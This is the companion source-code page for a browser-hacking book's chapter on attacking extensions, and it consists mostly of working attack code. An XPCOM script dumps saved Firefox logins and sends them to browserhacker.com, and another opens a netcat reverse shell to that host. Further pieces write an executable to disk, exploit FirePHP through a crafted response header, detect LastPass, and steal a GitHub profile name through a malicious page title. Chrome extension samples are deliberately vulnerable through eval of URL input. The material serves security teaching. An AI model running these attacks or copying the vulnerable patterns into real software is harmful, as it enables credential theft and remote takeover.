BHH logo

Ch7 Source Code - Attacking Extensions


Attacking XPCOM

// Exposing the Login Manager

// Get the login manager object
var l2m=Components.classes[
"@mozilla.org/loginmanager;1"].
getService(Components.interfaces.nsILoginManager);

// Get all credentials from the login manager
allCredentials = l2m.getAllLogins({});

// Extract all the hosts, usernames and passwords
for (i=0;i<=allCredentials.length;i=i+1){
  var url = "http://browserhacker.com/";
  url += "?host=" + encodeURI(allCredentials[i].hostname);
  url += "&user=" + encodeURI(allCredentials[i].username);
  url += "&password=" + encodeURI(allCredentials[i].password);
  window.open(url);
} 

// Reading from the filesystem
var fileToRead="file:///C:/boot.ini";
var fileContents=document.ReadURL.readFile(fileToRead);


// Writing to the filesystem
function makeFile(bdata){
  var workingDir= Components.classes[
  "@mozilla.org/file/directory_service;1"]
   .getService(Components.interfaces.nsIProperties)
   .get("Home", Components.interfaces.nsIFile);

  var aFile = Components.classes["@mozilla.org/file/local;1"]
        .createInstance(Components.interfaces.nsILocalFile);
  aFile.initWithPath( workingDir.path + "\\filename.exe" );
  aFile.createUnique( 
      Components.interfaces.nsIFile.NORMAL_FILE_TYPE, 777);

  var stream = Components.classes[
        "@mozilla.org/network/safe-file-outputstream;1"]
        .createInstance(Components.interfaces.nsIFileOutputStream);
  stream.init(aFile, 0x04 | 0x08 | 0x20, 0777, 0);
  stream.write(bdata, bdata.length);
  if (stream instanceof Components.interfaces.nsISafeOutputStream){
    stream.finish();
  } else {
   stream.close();
 }
}


//Executing Operating System Commands
var lFile = Components.classes["@mozilla.org/file/local;1"]
      .createInstance(Components.interfaces.nsILocalFile);
var lPath = "/bin/nc";
lFile.initWithPath(lPath);
var process = Components.classes["@mozilla.org/process/util;1"]
    .createInstance(Componen
ts.interfaces.nsIProcess);
process.init(lFile);
process.run(false,['-e', '/bin/bash', 'browserhacker.com', '12345'],4);

Chrome Extension CSP Bypass Example

Extension manifest

{
  "name": "Browser Hacker's Handbook CSP Bypass Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook CSP Bypass Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"http://content-security-policy.com/*"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "http://content-security-policy.com/*"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


// Get bhh URL parameter
var bhh = document.location.href.split('bhh=')[1];
if (typeof bhh == 'string') {
    eval(bhh); // eval the parameter
}


FirePHP Exploitation

FirePHP extension - XHR request to trigger the HTTP response with the exploit code

console.log('Exploit FirePHP start')
xhr = new XMLHttpRequest();
xhr.open("GET","http://browserhacker.com/",true);
xhr.send();
console.log('Mouseover FirePHP array to finish')

FirePHP extension - HTTP response containing exploit code

HTTP/1.1 200 OK
Date: Wed, 07 Aug 2013 00:27:48 GMT
Server: Apache
Last-Modified: Fri, 29 Mar 2013 22:45:39 GMT
ETag: "401b9-0-4d91807c0760e"
Accept-Ranges: bytes
Content-Length: 0
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
X-Wf-Protocol-1: http://meta.wildfirehq.org/Protocol/JsonStream/0.2
X-Wf-1-Plugin-1: http://meta.firephp.org/Wildfire/Plugin/FirePHP/Library-FirePHPCore/0.3
X-Wf-1-Structure-1: http://meta.firephp.org/Wildfire/Structure/FirePHP/Dump/0.1
X-Wf-1-1-1-1: 476|{"RequestHeaders":{"1":"1","2":"2","3":"3","4":"4","5":"5","6":"6","7":"7","8":"8","9":"9","UR<script>var lFile=Components.classes[\"@mozilla.org/file/local;1\"].createInstance(Components.interfaces.nsILocalFile);lFile.initWithPath(\"/Applications/Calculator.app/Contents/MacOS/Calculator\");var process=Components.classes[\"@mozilla.org/process/util;1\"].createInstance(Components.interfaces.nsIProcess);process.init(lFile);process.run(true,[],0);void(0);<\/SCRIPT>":"PWNT"}}|

LastPass detection

// LastPass detection
var result = "Not in use or not installed";

var lpdiv = document.getElementById('hiddenlpsubmitdiv');
// Check for the div first
if (typeof(lpdiv) != 'undefined' && lpdiv != null) {
  result = "Detected LastPass through presence of the <script> tag with id=hiddenlpsubmitdiv";

// Use JQuery to search inside script elements for the presence of lastpass_iter
} else if ($("script:contains(lastpass_iter)").length > 0) {
  result = "Detected LastPass through presense of the embedded <script> which includes references to lastpass_iter";
  
} else {
  if (document.getElementsByTagName("form").length == 0) {
      result = "The page doesn't seem to include any forms - we can't tell if LastPass is installed";
  }
}

Chrome Extension SOP Bypass example

Extension manifest:

{
  "name": "Browser Hacker's Handbook SOP Bypass Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook SOP Bypass Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"<all_urls>"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "<all_urls>"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


function do_something(title) {
// do something with the page title
}

var title = document.title;
window.setTimeout("do_something(\"" + title + "\")", 500);

Attack vector example:

<HTML>
<HEAD>
<TITLE>");
	var xhr = new XMLHttpRequest();
	xhr.open("GET", 'https://github.com/settings/profile/', true);
	
	xhr.onreadystatechange = function() {
	  if (xhr.readyState == 4) {
		github_settings_page = xhr.responseText;
		var name_regexp = /<input type="text" value="(.*)" tabindex="2"\/>/g; 
		var name_arr = name_regexp.exec(github_settings_page);
		name = name_arr[1];
		new Image().src = "http://browserhacker.com/" + encodeURI(name);
	  };
	};
	xhr.send();
	a=("</TITLE>
</HEAD>
<BODY>
	Browser Hacker's Handbook Extension SOP Bypass Example
</BODY>
</HTML>


Chrome Extensions Universal XSS example:

Manifest example:

{
  "name": "Browser Hacker's Handbook UXSS Example",
  "version": "1.0",
  "description": "Browser Hacker's Handbook Universal XSS Demonstration",
  "homepage_url": "http://browserhacker.com",
  "permissions": [
	"<all_urls>"
  ],
    "content_scripts": [
    {
      "all_frames": true, 
      "js": [
        "cs.js"
      ], 
      "matches": [
        "<all_urls>"
      ], 
      "run_at": "document_end",
      "all_frames": true
    }
    ],
    "manifest_version": 2
}

cs.js source code:


// Get bhh URL parameter
var bhh = document.location.href.split('bhh=')[1];
if (typeof bhh == 'string') {
    eval(bhh); // eval the parameter
}